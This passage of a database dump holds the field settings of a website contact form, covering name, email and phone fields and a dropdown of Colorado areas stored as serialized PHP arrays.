nfo_field_group_custom',''),(3049,97,'show_desc','0','show_desc','0'),(3050,97,'desc_pos','none','desc_pos','none'),(3051,97,'desc_text','','desc_text',''),(3052,97,'element_class','','element_class',''),(3053,97,'required','1','required','1'),(3054,97,'key','textbox_6','key','textbox_6'),(3055,97,'default','','default',''),(3056,97,'container_class','one-half first','container_class','one-half first'),(3057,97,'manual_key','','manual_key',''),(3058,97,'custom_mask','','custom_mask',''),(3059,97,'parent_id','10','parent_id','10'),(3060,98,'objectType','Field','objectType','Field'),(3061,98,'objectDomain','fields','objectDomain','fields'),(3062,98,'editActive','','editActive',''),(3063,98,'order','3','order','3'),(3064,98,'type','lastname','type','lastname'),(3065,98,'def_id','7','def_id','7'),(3066,98,'label','Last Name','label','Last Name'),(3067,98,'label_pos','above','label_pos','above'),(3068,98,'mask','','mask',''),(3069,98,'datepicker','0','datepicker','0'),(3070,98,'send_email','0','send_email','0'),(3071,98,'from_email','0','from_email','0'),(3072,98,'first_name','0','first_name','0'),(3073,98,'from_name','0','from_name','0'),(3074,98,'user_info_field_group','1','user_info_field_group','1'),(3075,98,'show_help','0','show_help','0'),(3076,98,'help_text','','help_text',''),(3077,98,'calc_auto_include','0','calc_auto_include','0'),(3078,98,'calc_option','0','calc_option','0'),(3079,98,'placeholder','','placeholder',''),(3080,98,'user_address_1','','user_address_1',''),(3081,98,'user_address_2','','user_address_2',''),(3082,98,'user_city','','user_city',''),(3083,98,'user_zip','','user_zip',''),(3084,98,'user_phone','','user_phone',''),(3085,98,'user_email','','user_email',''),(3086,98,'disable_input','0','disable_input','0'),(3087,98,'input_limit','','input_limit',''),(3088,98,'input_limit_type','char','input_limit_type','char'),(3089,98,'input_limit_msg','','input_limit_msg',''),(3090,98,'user_state','0','user_state','0'),(3091,98,'autocomplete_off','0','autocomplete_off','0'),(3092,98,'num_sort','0','num_sort','0'),(3093,98,'admin_label','','admin_label',''),(3094,98,'user_info_field_group_name','','user_info_field_group_name',''),(3095,98,'user_info_field_group_custom','','user_info_field_group_custom',''),(3096,98,'show_desc','0','show_desc','0'),(3097,98,'desc_pos','none','desc_pos','none'),(3098,98,'desc_text','','desc_text',''),(3099,98,'element_class','','element_class',''),(3100,98,'required','1','required','1'),(3101,98,'key','lastname_8','key','lastname_8'),(3102,98,'default','','default',''),(3103,98,'container_class','one-half','container_class','one-half'),(3104,98,'parent_id','10','parent_id','10'),(3105,99,'objectType','Field','objectType','Field'),(3106,99,'objectDomain','fields','objectDomain','fields'),(3107,99,'editActive','','editActive',''),(3108,99,'order','4','order','4'),(3109,99,'type','email','type','email'),(3110,99,'def_id','14','def_id','14'),(3111,99,'label','Email','label','Email'),(3112,99,'label_pos','above','label_pos','above'),(3113,99,'mask','','mask',''),(3114,99,'datepicker','0','datepicker','0'),(3115,99,'send_email','0','send_email','0'),(3116,99,'from_email','0','from_email','0'),(3117,99,'first_name','0','first_name','0'),(3118,99,'last_name','0','last_name','0'),(3119,99,'from_name','0','from_name','0'),(3120,99,'user_address_1','0','user_address_1','0'),(3121,99,'user_address_2','0','user_address_2','0'),(3122,99,'user_city','0','user_city','0'),(3123,99,'user_zip','0','user_zip','0'),(3124,99,'user_phone','0','user_phone','0'),(3125,99,'user_info_field_group','1','user_info_field_group','1'),(3126,99,'show_help','0','show_help','0'),(3127,99,'help_text','','help_text',''),(3128,99,'calc_auto_include','0','calc_auto_include','0'),(3129,99,'calc_option','0','calc_option','0'),(3130,99,'placeholder','','placeholder',''),(3131,99,'disable_input','0','disable_input','0'),(3132,99,'input_limit','','input_limit',''),(3133,99,'input_limit_type','char','input_limit_type','char'),(3134,99,'input_limit_msg','','input_limit_msg',''),(3135,99,'user_state','0','user_state','0'),(3136,99,'autocomplete_off','0','autocomplete_off','0'),(3137,99,'num_sort','0','num_sort','0'),(3138,99,'admin_label','','admin_label',''),(3139,99,'user_info_field_group_name','','user_info_field_group_name',''),(3140,99,'user_info_field_group_custom','','user_info_field_group_custom',''),(3141,99,'show_desc','0','show_desc','0'),(3142,99,'desc_pos','none','desc_pos','none'),(3143,99,'desc_text','','desc_text',''),(3144,99,'element_class','','element_class',''),(3145,99,'required','1','required','1'),(3146,99,'key','email_10','key','email_10'),(3147,99,'default','','default',''),(3148,99,'container_class','one-half first','container_class','one-half first'),(3149,99,'parent_id','10','parent_id','10'),(3150,100,'objectType','Field','objectType','Field'),(3151,100,'objectDomain','fields','objectDomain','fields'),(3152,100,'editActive','','editActive',''),(3153,100,'order','5','order','5'),(3154,100,'type','phone','type','phone'),(3155,100,'def_id','15','def_id','15'),(3156,100,'label','Phone','label','Phone'),(3157,100,'label_pos','above','label_pos','above'),(3158,100,'mask','(999) 999-9999','mask','(999) 999-9999'),(3159,100,'datepicker','0','datepicker','0'),(3160,100,'send_email','0','send_email','0'),(3161,100,'from_email','0','from_email','0'),(3162,100,'first_name','0','first_name','0'),(3163,100,'last_name','0','last_name','0'),(3164,100,'from_name','0','from_name','0'),(3165,100,'user_address_1','0','user_address_1','0'),(3166,100,'user_address_2','0','user_address_2','0'),(3167,100,'user_city','0','user_city','0'),(3168,100,'user_zip','0','user_zip','0'),(3169,100,'user_email','0','user_email','0'),(3170,100,'user_info_field_group','1','user_info_field_group','1'),(3171,100,'show_help','0','show_help','0'),(3172,100,'help_text','','help_text',''),(3173,100,'calc_auto_include','0','calc_auto_include','0'),(3174,100,'calc_option','0','calc_option','0'),(3175,100,'placeholder','','placeholder',''),(3176,100,'disable_input','0','disable_input','0'),(3177,100,'input_limit','','input_limit',''),(3178,100,'input_limit_type','char','input_limit_type','char'),(3179,100,'input_limit_msg','','input_limit_msg',''),(3180,100,'user_state','0','user_state','0'),(3181,100,'autocomplete_off','0','autocomplete_off','0'),(3182,100,'num_sort','0','num_sort','0'),(3183,100,'admin_label','','admin_label',''),(3184,100,'user_info_field_group_name','','user_info_field_group_name',''),(3185,100,'user_info_field_group_custom','','user_info_field_group_custom',''),(3186,100,'show_desc','0','show_desc','0'),(3187,100,'desc_pos','none','desc_pos','none'),(3188,100,'desc_text','','desc_text',''),(3189,100,'element_class','','element_class',''),(3190,100,'required','1','required','1'),(3191,100,'key','phone_9','key','phone_9'),(3192,100,'default','','default',''),(3193,100,'container_class','one-half','container_class','one-half'),(3194,100,'manual_key','','manual_key',''),(3195,100,'custom_mask','','custom_mask',''),(3196,100,'parent_id','10','parent_id','10'),(3197,101,'objectType','Field','objectType','Field'),(3198,101,'objectDomain','fields','objectDomain','fields'),(3199,101,'editActive','','editActive',''),(3200,101,'order','6','order','6'),(3201,101,'type','listselect','type','listselect'),(3202,101,'label','Your Local Area','label','Your Local Area'),(3203,101,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3204,101,'label_pos','above','label_pos','above'),(3205,101,'list_type','dropdown','list_type','dropdown'),(3206,101,'multi_size','5','multi_size','5'),(3207,101,'list_show_value','1','list_show_value','1'),(3208,101,'list','a:0:{}','list','a:0:{}'),(3209,101,'user_info_field_group','','user_info_field_group',''),(3210,101,'calc_auto_include','0','calc_auto_include','0'),(3211,101,'user_state','0','user_state','0'),(3212,101,'num_sort','0','num_sort','0'),(3213,101,'admin_label','','admin_label',''),(3214,101,'show_help','0','show_help','0'),(3215,101,'help_text','','help_text',''),(3216,101,'show_desc','0','show_desc','0'),(3217,101,'desc_pos','none','desc_pos','none'),(3218,101,'desc_text','','desc_text',''),(3219,101,'element_class','','element_class',''),(3220,101,'required','1','required','1'),(3221,101,'options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 